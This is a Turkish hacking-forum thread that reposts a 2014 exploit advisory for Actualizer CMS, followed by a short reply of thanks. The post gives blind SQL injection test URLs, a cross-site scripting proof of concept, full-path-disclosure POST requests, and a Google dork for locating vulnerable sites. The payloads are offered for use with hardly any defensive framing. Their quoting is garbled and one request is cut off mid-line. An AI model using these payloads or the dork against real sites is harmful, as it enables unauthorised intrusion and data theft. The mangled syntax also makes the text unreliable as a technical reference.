Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Actualizer CMS – Multiple Vulnerabilities
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı: 121
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
Actualizer CMS – Multiple Vulnerabilities
20.01.2014 09:37


Title: Actualizer CMS – Multiple Vulnerabilities
Date: 22.09.2013
Tested on: Linux 3.0 – 3.9 (95%)
Vendor: actualizer.pl
Dork: intext:”Powered by Actualizer & Heuristic”
Contact:
[email protected]

1. Blind SQL Injection

PHP Kod:
host/galeria/galeria-/gal,1 ‘%20or%20’1′=’2.html – false
host
/galeria/galeria-2/gal,1 ‘%20or%20’1 ‘‘ 1. html – true 
PoC:

PHP Kod:
http://site/galeria/galeria-2/gal,1 ‘%20or%20 ’1′=’ 2. html 
2. Cross Site Scripting

PHP Kod:
host/katalog/nowosci/archiwum/year,”xss 
PoC:

PHP Kod:
site/katalog/nowosci/archiwum/year,”xss 
3. Full Path Disclosure
PHP Kod:
host/newsletter.php
POST
action=save&cat=666%email[]=asdf@asdf.com&imie=devil

host
/konto/rejestracja
POST 
(multipart): login=
Hide Post

Post Tagged In: Blind SQL Injection, exploits, sql injection, sqli, vulnerability
(Bu konu en son: 20.01.2014 Tarihinde, Saat: 09:47 düzenlenmiştir. Düzenleyen: DaRKNeSS.)


Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 43
Yaşam Puanı: 1,050 / 1,050
Deneyim: 1 / 100
Rep Sayısı: 1038
Mesaj Sayısı: 2996
Üyelik Tarihi: 04.05.2013
      
Yorum: #2
Cvp: Actualizer CMS – Multiple Vulnerabilities
20.01.2014 11:54
eline sağlık Smile

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti



1 Ziyaretçi